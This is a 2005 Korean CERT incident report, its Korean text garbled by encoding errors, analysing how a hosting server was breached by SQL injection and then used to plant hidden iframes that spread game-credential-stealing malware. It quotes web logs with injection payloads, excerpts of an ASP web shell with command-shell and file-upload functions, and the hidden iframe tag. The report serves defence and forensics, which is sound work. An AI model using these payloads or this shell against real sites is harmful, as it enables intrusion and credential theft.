[ÀÚ·á: Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø(KISA)]
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 2 -
1. °³ ¿ä
ÃÖ±Ù ±¹³» ȨÆäÀÌÁöµéÀÌ ÇØÅ·´çÇØ ÀÏ¹Ý PC »ç¿ëÀÚµéÀÌ ÇØÅ·´çÇÑ È¨ÆäÀÌÁö¸¦ ¹æ¹®¸¸ ÇÏ¿©µµ ¾Ç¼º Äڵ忡 °¨
¿°µÇ¾î °ÔÀÓ°ü·Ã Á¤º¸°¡ À¯ÃâµÇ´Â ÇÇÇØ°¡ ¹ß»ýµÇ°í ÀÖ´Ù.
ÀÌ·¯ÇÑ »ç°í´Â Áß±¹¿¡¼ Á¦ÀÛµÈ °ÍÀ¸·Î ÃßÁ¤µÇ´Â ÀÚµ¿ÈµÈ °ø°Ýµµ±¸°¡ °ø°³µÇ¸é¼ ±¹³»ÀÇ Ãë¾àÇÑ È¨ÆäÀÌÁö
¿¡¼ ±¤¹üÀ§ÇÑ ÇÇÇØ°¡ ¹ß»ýµÇ°í ÀÖ´Â °ÍÀ¸·Î º¸¿©Áø´Ù.
ÇØÅ·´çÇØ ¾Ç¼º Äڵ尡 »ðÀÔµÈ À¥ »çÀÌÆ®µéÀº ´ëºÎºÐ Windows 2000 ¼¹ö Ç÷§Æû¿¡ IIS À¥ ¼¹ö°¡ ±¸µ¿ Áß¿¡
ÀÖ¾úÀ¸¸ç, MS-SQL DB¸¦ »ç¿ëÇϰí ÀÖ¾ú´Ù.
¡®05³â 6¿ù¿¡ ±¹³» ÇÑ À¥ È£½ºÆÃ ¾÷ü¿¡¼ ¼ºñ½º ÁßÀÎ °í°´ »çÀÌÆ®µµ ÇØÅ·À» ´çÇØ Ãʱâ ȸ鿡 ¾Ç¼ºÄڵ尡
»ðÀԵǴ »ç°í°¡ ¹ß»ýµÇ¾ú´Ù.
»ç°íºÐ¼® °á°ú Áß±¹¿¡ ÇÒ´çµÈ IP·ÎºÎÅÍ °ø°ÝÀÌ ÀÌ·ç¾îÁ³À¸¸ç, °ø°Ý °úÁ¤Àº ´ÙÀ½°ú °°Àº °ÍÀ¸·Î º¸¿©Áø´Ù.
¨ç »ç¿ëÀÚ ÀÔ·Â ¶Ç´Â URL ÀÎÀÚ°ª¿¡¼ SQL Injection °ø°ÝÀÌ °¡´ÉÇÑ ÆäÀÌÁö Ž»ö
¨è Ãë¾à ÆäÀÌÁö¿¡ ´ëÇÑ SQL Injection °ø°Ý ¼öÇà
- ÀÚµ¿ÈµÈ °ø°Ý µµ±¸¸¦ ÀÌ¿ëÇÏ¿© ¿ø°ÝÁö¿¡¼ MS SQL ¼¹ö¿¡ ÁúÀÇ ¹× °á°ú°ª ȸ½Å
¨é À¥ ºê¶ó¿ìÁ®¸¦ ÅëÇØ Shell µîÀ» ȹµæÇÒ ¼ö ÀÖ´Â ¾Ç¼º ASP ÆÄÀÏ ¾÷·Îµå
¨ê ¾÷·ÎµåÇÑ ¾Ç¼º ASP ÆÄÀÏÀ» ÅëÇØ¼ À妽º ÆÄÀÏ(index.html µî)¿¡ ¾Ç¼ºÄÚµå »ðÀÔ(iframe Ãß°¡)
º» º¸°í¼¿¡¼´Â ÇÇÇØ ½Ã½ºÅÛÀÇ À¥ ·Î±× ºÐ¼® ¹× °ø°ÝÀÚ¿¡ ÀÇÇØ ³²°ÜÁø °ø°ÝÅøÀ» ºÐ¼®ÇÔÀ¸·Î½á
»ó±â °ø°Ý ¹æ¹ý¿¡ ´ëÇØ Á» ´õ ÀÚ¼¼È÷ »ìÆìº¸µµ·Ï ÇÑ´Ù.
¶ÇÇÑ, ÀÎÅÍ³Ý »ó¿¡¼ ÀÔ¼öÇÑ °ø°Ýµµ±¸¸¦ Å×½ºÆ®ÇØ º¸°í, À¥ °ü¸®ÀÚµéÀÌ ÀÌ·¯ÇÑ °ø°ÝÀ» ¿¹¹æÇϰí
´ëÀÀÇϱâ À§ÇÑ ¹æ¾ÈÀ» »ìÆìº¸µµ·Ï ÇÑ´Ù.
2. ÇÇÇØ½Ã½ºÅÛ °³¿ä
1) ¿î¿µÃ¼Á¦ : Windows 2000 ¼¹ö
Microsoft-
IIS/5.0
MS-
SQL
2) ½Ã½ºÅÛ ¿ëµµ : À¥ È£½ºÆÃ ¿ë(ÃÑ 205°³ÀÇ »çÀÌÆ® ¿î¿µ)
3) º¸¾È ÇöȲ
- ÇØ´ç ½Ã½ºÅÛÀº À©µµ¿ìÁî ¼¹ö ¹× IIS °ü·Ã º¸¾È ÆÐÄ¡´Â ÁÖ±âÀûÀ¸·Î ÀÌ·ç¾îÁö°í ÀÖ¾úÀ¸¸ç, ħ
ÀÔÂ÷´Ü½Ã½ºÅÛ µî Ãß°¡ÀûÀÎ º¸¾È Àåºñ´Â »ç¿ëÇϰí ÀÖÁö ¾Ê¾ÒÀ½
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 3 -
3. ÇÇÇØ ÇöȲ
ÇØ´ç ÇÇÇØ ½Ã½ºÅÛ¿¡¼ ¿î¿µ ÁßÀÎ 205°³ÀÇ »çÀÌÆ®µéÀÇ Ãʱâȸé(index.html)µé¿¡ iframe ű׸¦
ÀÌ¿ëÇÑ ¾Ç¼ºÄڵ尡 »ðÀԵǾî ÀÖ¾ú´Ù.
ÇÏÁö¸¸ ½ÇÁ¦ ȨÆäÀÌÁö ȸ鸸À¸·Î´Â ȨÆäÀÌÁö ÇØÅ·»ç½ÇÀ» È®ÀÎÇÒ ¼ö ¾øµµ·Ï °ø°Ý¿¡ ÀÌ¿ëµÇ´Â È
¸éÀÇ »çÀÌÁ 0À¸·Î ¼³Á¤ÇÏ¿© ³õ¾Ò´Ù.
<iframe src ="http://www.xxx.xx.xx/123/123/index.htm" name ="A" width="0" frameborder="0">
º¸¾È ÆÐÄ¡¸¦ ÇÏÁö ¾ÊÀº ÀÎÅÍ³Ý ÀÌ¿ëÀÚ°¡ ÇØ´ç »çÀÌÆ®¿¡ Á¢¼ÓÇÒ °æ¿ì PC¿¡ ¾Ç¼ºÄڵ尡 ¼³Ä¡µÇ°í
±¹³» ƯÁ¤ ¿Â¶óÀÎ °ÔÀÓ ¾ÆÀ̵ð¿Í ºñ¹Ð¹øÈ£¸¦ Áß±¹ ¸ÞÀÏ ÁÖ¼Ò·Î ¹ß¼ÛÇÏ°Ô µÈ´Ù.
4. ÇÇÇØ ºÐ¼®
¡à Áß±¹¿¡ ÇÒ´çµÈ IP·Î ºÎÅÍÀÇ °ø°Ý ½Ãµµ
ÇØ´ç ÇÇÇØ ½Ã½ºÅÛÀÇ IIS À¥ ·Î±×¿¡¼ Áß±¹¿¡ ÇÒ´çµÈ IP(xxx.48.81.xx)·ÎºÎÅÍÀÇ ´Ù¾çÇÑ °ø°ÝÀ» È®ÀÎ
ÇÒ ¼ö ÀÖ´Ù.
route: xxx.48.0.0/16
descr: CHINA NETWORK COMMUNICATION
origin: AS4814
mnt-by: MAINT-AS4814
changed: ttong@publicf.bta.net.cn 20030818
source: SAVVIS
ÇØ´ç IP ´ë¿ªÀ¸·ÎºÎÅÍ ¼öõ°³ÀÇ °ø°Ý °ü·Ã ·Î±×°¡ ³²¾Ò´Âµ¥, ÀϺΠ·Î±×´Â ¼öµ¿ °ø°Ý¿¡ ÀÇÇÑ °Í
µµ ÀÖ¾úÁö¸¸ ´Ù¼öÀÇ ·Î±×´Â ÀÚµ¿ÈµÈ °ø°ÝÅø¿¡ ÀÇÇØ ³²°ÜÁø °ÍÀ¸·Î º¸¿© Áø´Ù.
¡à SQL Injection °ø°Ý ÈçÀû
°ø°ÝÀÚ´Â À¥ »çÀÌÆ®¸¦ °Ë»öÇÏ¿© SQL Injection °ø°ÝÀÌ °¡´ÉÇÑ ÆäÀÌÁö¸¦ °Ë»öÇÑ °ÍÀ¸·Î º¸¿©Áø
´Ù. ÇØ´ç ÇÇÇØ ½Ã½ºÅÛ¿¡¼´Â °øÁö»çÇ׿¡ ¿Ã¶ó¿Â °Ô½Ã¹°ÀÇ ÀÎÀÚ°ª¿¡ SQL ±¸¹®À» ÀÔ·ÂÇÑ °ÍÀ¸·Î º¸
¿©Áø´Ù. ¾Æ·¡¿Í À¯»çÇÑ ·Î±×°¡ ªÀº ½Ã°£¿¡ ¼ö¹é°³ Á¤µµ ³ªÅ¸³ª°í Àִµ¥ ÀÌ´Â ÀÚµ¿ÈµÈ Åø¿¡ ÀÇ
ÇÑ °ÍÀ¸·Î ÃßÁ¤µÈ´Ù.
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 4 -
ex050611.log:2005-06-11 17:23:02 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529'|27|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Unclosed_quotation_mark_before_the_character_st
ring_''. 500 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:23:14 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp id=529 200
Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:17 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529%20and%20user%2Bchar(124)=0|27|80040e07|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Syntax_error_conve
rting_the_nvarchar_value_'victim|'_to_a_column_of_data_type_int. 500 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:20 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp id=529;declare%20@a%20int--
200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:20 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529%20and%20(Select%20count([name])%20from%20[master]..[sysobjects])>=0 200 Microsoft+URL+Control+-+6.00.8862
¿ª½Ã °ø°ÝÀÚ´Â °Ô½Ã±Û¿¡ Á¸ÀçÇÏ´Â SQL Injection Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© ÆÄÀÏ ½Ã½ºÅÛÀ» Á¶È¸ÇÑ´Ù.
´ÙÀ½ ·Î±×´Â °ø°ÝÀÚ°¡ bb¶ó´Â DB Å×À̺íÀ» »ý¼ºÇϰí MS-SQL¿¡¼ Á¦°øÇÏ´Â È®Àå ÀúÀå ÇÁ·Î½ÃÁ®
ÀÎ xp_dirtree¸¦ ½ÇÇàÇÏ´Â °ÍÀ» º¼ ¼ö ÀÖ´Ù. xp_dirtree´Â ÁöÁ¤ÇÑ °æ·Î ÇÏÀ§ÀÇ ¸ðµç ¼ºê µð·ºÅ丮
¸¦ º¸¿©ÁÖ´Â °ÍÀ¸·Î °ø°ÝÀÚ´Â C:\ ÇÏÀ§¸¦ ¸®½ºÆÃÇÏ¿´´Ù.
ex050611.log:2005-06-11 17:23:33 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DROP%20TABLE%20bb;CREATE%20TABLE%20bb(subdirectory%20nvarchar(256)%20NULL,depth%20tinyint%20NUL
L,[file]%20bit%20NULL)-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:23:34 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'C:\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
°ø°ÝÀÚ´Â ÇÇÇØ »çÀÌÆ®ÀÇ ÇÏÀ§ µð·ºÅ丮·Î ³»·Á°¡¸é¼ ÆÄÀϵéÀ» È®ÀÎÇϰí ÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ´Ù.
ÀÌ·¯ÇÑ ·Î±×´Â ¼öµ¿À¸·Î ¸¸µé¾î Áø °Í À̶ó±â º¸´Ù´Â ÆÄÀÏ ½Ã½ºÅÛÀ» ºê¶ó¿ì¡ ÇÒ ¼ö ÀÖ´Â ÅøÀ»
ÀÌ¿ëÇÏ¿© ÆÄÀϵéÀ» ¿¶÷ÇÑ °ÍÀ¸·Î ÃßÁ¤µÈ´Ù.
ex050611.log:2005-06-11 17:23:34 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'C:\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:24:06 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:29:18 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:29:29 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:33:05 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\admin\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:34:03 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\admin\data\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
ex050611.log:2005-06-11 17:34:31 xxx.48.81.23 - victim_IP 80 GET /announce/new_detail.asp
id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20'd:\victim\html\admin\',1,1-- 200 Microsoft+URL+Control+-+6.00.8862
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 5 -
¡à °ü¸®ÀÚ ÆäÀÌÁö¿¡ ´ëÇÑ °ø°Ý ÈçÀû
°ø°ÝÀÚ´Â °ü¸®ÀÚ ·Î±×ÀÎ ÆäÀÌÁö¿¡ ´ëÇÑ Á¢¼ÓÀ» ½ÃµµÇß´Ù. À¥ °ü¸®ÀÚ ÆäÀÌÁö¸¦ À¯ÃßÇÏ¿© Á¢±Ù ½Ã
µµÇϰí, °ü¸®ÀÚ ·Î±×ÀÎÀ» ¿ìȸÇÏ¿© Á÷Á¢ °ü¸®ÀÚ ±ÇÇÑÀÇ ÆíÁý ÆäÀÌÁö¸¦ ã°íÀÚ Çß´Ù.
ex050611.log:2005-06-11 17:41:16 xxx.48.81.23 - victim_IP 80 POST /admin/adminok.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:41:23 xxx.48.81.23 - victim_IP 80 GET /admin/administrator/admin.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:41:34 xxx.48.81.23 - victim_IP 80 GET /admin/administrator/admin.asp
mode=update&no=4&status=D 200 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:41:40 xxx.48.81.23 - victim_IP 80 GET /admin/administrator/adminedit.asp no=4 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
½ÇÁ¦ ÇØ´ç ÇÇÇØ »çÀÌÆ®ÀÇ °ü¸®ÀÚ ·Î±×ÀÎ ÆäÀÌÁö´Â ´©±¸³ª À¯Ãß°¡ °¡´ÉÇÑ À̸§(admin)À̾úÀ¸¸ç,
IP¿¡ ÀÇÇÑ Á¢±ÙÅëÁ¦µµ ÀÌ·ç¾îÁöÁö ¾Ê¾Æ º¸¾ÈÀÌ Ãë¾àÇÑ »óÅ¿´´Ù. ¾Æ·¡ ±×¸²Àº ÇÇÇØ »çÀÌÆ®ÀÇ °ü¸®
ÀÚ ·Î±×ÀÎ ÆäÀÌÁöÀÇ Á¢¼Ó ȸéÀÌ´Ù.
Áß±¹¿¡ ÇÒ´çµÈ IP¿¡¼ »Ó¸¸ ¾Æ´Ï¶ó ±¹³»¿¡¼µµ °ü¸®ÀÚ ÆäÀÌÁö¿¡ ´ëÇØ °ø°ÝÀ¸·Î ÃßÁ¤µÇ´Â ·Î±×
°¡ ³²¾Æ ÀÖ¾ú´Ù. ¾Æ·¡¿Í °°Àº °ü¸®ÀÚ ÆäÀÌÁö¿¡ ´ëÇØ 10¿© Â÷·Ê ¹Ýº¹ÀûÀ¸·Î Á¢¼ÓÇÑ ·Î±×°¡ ³²¾Ò´Â
µ¥ ÀÌ´Â °ü¸®ÀÚ °èÁ¤¿¡ ´ëÇÑ ÆÐ½º¿öµå À¯Ãß ¶Ç´Â SQL Injection °ø°Ý¿¡ ÀÇÇÑ °ÍÀ¸·Î º¸¿©Áø´Ù.
ex050616.log:2005-06-16 15:28:54 xxx.xxx.xx.202 - victim_IP 80 POST /admin/adminok.asp - 302
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 15:28:54 xxx.xxx.xx.202 - victim_IP 80 GET /admin/index.html - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 15:28:59 xxx.xxx.xx.202 - victim_IP 80 POST /admin/adminok.asp - 302
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 15:28:59 xxx.xxx.xx.202 - victim_IP 80 GET /admin/index.html - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 6 -
¡à ¾Ç¼º ASP ÆÄÀÏ ¾÷·Îµå ¹× À¥ ÆäÀÌÁö ÆíÁý
»ç°í ºÐ¼® ´ç½Ã À¥ °ü¸®ÀÚ¸¸ÀÌ À̹ÌÁö ÆÄÀÏÀ» ¿Ã¸± ¼ö ÀÖ´Â µð·ºÅ丮¿¡ °ø°Ý¿ë ASP ÆÄÀϵéÀÌ ¾÷
·Îµå µÇ¾î ÀÖ¾ú´Ù.
´ÙÀ½ ±×¸²Àº °ø°ÝÀÚ¿¡ ÀÇÇØ ¾÷·ÎµåµÈ ASP ÆÄÀϵé ÁßÀÇ ÇϳªÀÎ ok7.asp ÆÄÀÏÀ» À¥ ºê¶ó¿ìÁ®¿¡¼
½ÇÇàÇÑ È¸éÀÌ´Ù.
ÀÌ ASP ÆÄÀÏÀÇ È¸éÀº Áß±¹¾î·Î ±¸¼ºµÇ¾î ÀÖ¾ú´Âµ¥ ¾Æ·¡ÀÇ ¼Ò½ºÄڵ带 º¸¸é °ø°ÝÀÚ°¡ ÇÇÇØ ¼
¹öÀÇ ÆÄÀÏ ¹× Æú´õ¿¡ ´ëÇØ ¿¶÷/´Ù¿î·Îµå/»èÁ¦/ÆíÁý/º¹»ç/À̵¿, ÆÄÀÏ ¾÷·Îµå, CMD.EXE ½© ȹµæ,
MS-SQL DB °ü¸®, ¼¹ö Á¤º¸ Á¶È¸ µîÀÇ ±â´ÉÀÌ ÀÖ´Â °ÍÀ¸·Î º¸¿©Áø´Ù. ÀÌ Åø¿¡ ÀÇÇØ index.html
ÆÄÀÏ¿¡ iframe ű׸¦ »ðÀÔÇÏ´Â µîÀÇ ÀÛ¾÷À» ÇßÀ» °ÍÀ¸·Î º¸¿©Áø´Ù.
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 7 -
Select Case Action
Case "MainMenu":MainMenu()
Case "ShowFile"
Set ABC=New LBF:ABC.ShowFile(Session("FolderPath")):Set ABC=Nothing
Case "DownFile":DownFile FName:ShowErr()
Case "DelFile"
Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
Case "EditFile"
Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
Case "CopyFile"
Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
Case "MoveFile"
Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
Case "DelFolder"
Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
Case "CopyFolder"
Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
Case "MoveFolder"
Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
Case "NewFolder"
Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
Case "UpFile":UpFile()
Case "CmdShell":CmdShell()
Case "Logout":Session.Contents.Remove("webadmin"):Response.Redirect URL
Case "CreateMdb":CreateMdb FName
Case "CompactMdb":CompactMdb FName
Case "DbManager":DbManager()
Case "Course":Course()
Case "ServerInfo":ServerInfo()
Case Else MainForm()
End Select
...
Function CmdShell()
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
...
function FullDbStr(i){
if(i<0){
return false;
}
Str = new Array(12);
Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<%=RePath(Session("FolderPath"))%>\\db.mdb;Jet
OLEDB:Database Password=***";
Str[1] = "Driver={Sql Server};Server=<%=ServerIP%>,1433;Database=DbName;Uid=sa;Pwd=****";
Str[2] = "Driver={MySql};Server=<%=ServerIP%>;Port=3306;Database=DbName;Uid=root;Pwd=****";
Str[3] = "Dsn=DsnName";
Str[4] = "SELECT * FROM [TableName] WHERE ID<100";
Str[5] = "INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')";
Str[6] = "DELETE FROM [TableName] WHERE ID=100";
Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";
Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
Str[9] = "DROP TABLE [TableName]";
...
IIS À¥ ·Î±×¿¡´Â ÀÌµé ¾ÇÀÇÀûÀÎ ASP ÆÄÀϵéÀ» ÀÌ¿ëÇÏ¿© ÇÇÇØ ½Ã½ºÅÛ¿¡ ÆÄÀÏ ÆíÁý µîÀ» ÇÑ ÈçÀû
ÀÌ ³²¾Æ ÀÖ¾ú´Ù.
KrCERT-IN-2005-012 http://www.krcert.or.kr
À¥ ÇØÅ·À» ÅëÇÑ ¾Ç¼º ÄÚµå À¯Æ÷ »çÀÌÆ® »ç°í »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 8 -
¾Æ·¡ ·Î±×´Â ±¹³» ¸ð Åë½Å»ç IP ºí·ÏÀ¸·ÎºÎÅÍ ok7.asp ÆÄÀÏ¿¡ Á¢±ÙÇÏ¿© ÇÇÇØ½Ã½ºÅÛÀÇ ÆÄÀÏÀ» ¸®
½ºÆÃÇÏ°í Æ¯Á¤ ÆÄÀÏÀ» ¾÷·ÎµåÇϰí, ¶ÇÇÑ Æ¯Á¤ ÆÄÀÏÀ» ÆíÁýÇÑ ÈçÀûÀ» ã¾Æ º¼ ¼ö ÀÖ´Ù.
ex050616.log:2005-06-16 16:18:03 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=MainMenu 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:18:04 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=ShowFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:18:41 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=CmdShell 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:20:11 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=UpFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:21:05 xxx.xxx.xx.202 - victim_IP 80 POST /gallery/ok7.asp Action=UpFile&Action2=Post 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:21:07 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=ShowFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
ex050616.log:2005-06-16 16:21:25 xxx.xxx.xx.202 - victim_IP 80 GET /gallery/ok7.asp Action=EditFile 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)
¶ÇÇÑ, Áß±¹¿¡ ÇÒ´çµÈ IP¿¡¼µµ À̹ÌÁö ÆÄÀÏÀ» ¾÷·ÎµåÇÏ´Â µð·ºÅ丮¿¡¼ new2.asp¿Í sent.asp µî
À» ÀÌ¿ëÇÏ¿© ÆÄÀÏÀ» ¼öÁ¤ÇÑ °Íµµ º¼ ¼ö ÀÖ´Ù.
ex050611.log:2005-06-11 17:43:49 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/°æ±â?å¸é.jpg - 200
Mozilla/4.0+(compatib+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:43:49 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/°æ±â횁ø횉횪+½횋횈횉µé+±â
³ä횄횚¿µ1.(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:44:29 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/news2.asp - 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:56:38 xxx.48.81.23 - victim_IP 80 POST /gallery/gimage/news2.asp
u=execute(application(%22fileContent%22))&pageName=fso&theAct=upload&thePath=D%3A\victim\html\&theFile=C:\Doc
uments%20and%20Settings\Administrator\횞?횄æ\횊üþ\severWrite=false&fileName=D:\victim\html\ 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 17:56:46 xxx.48.81.23 - victim_IP 80 GET /gallery/gimage/news2.asp
u=execute(application(%22fileContent%22))&pageName=fso&thePath=D:\victim\html\ 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 18:08:27 xxx.48.81.23 - victim_IP 80 GET /sent.asp
pageName=FsoFileExplorer&theAct=showEdit&thePath=D%3A%5Cagency1%5Chtml%5Cindex%2Ehtm 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 18:08:34 xxx.48.81.23 - victim_IP 80 POST /sent.asp
pageName=FsoFileExplorer&theAct=showEdit&thePath=D%3A%5Cagency1%5Chtml%5Cindex%2Ehtm 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
ex050611.log:2005-06-11 19:11:28 xxx.48.81.23 - victim_IP 80 GET /sent.asp
pageName=FsoFileExplorer&theAct=showEdit&thePath=D%3A%5Chmcadmin%5Chtml%5Cindex%2Easp 200
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
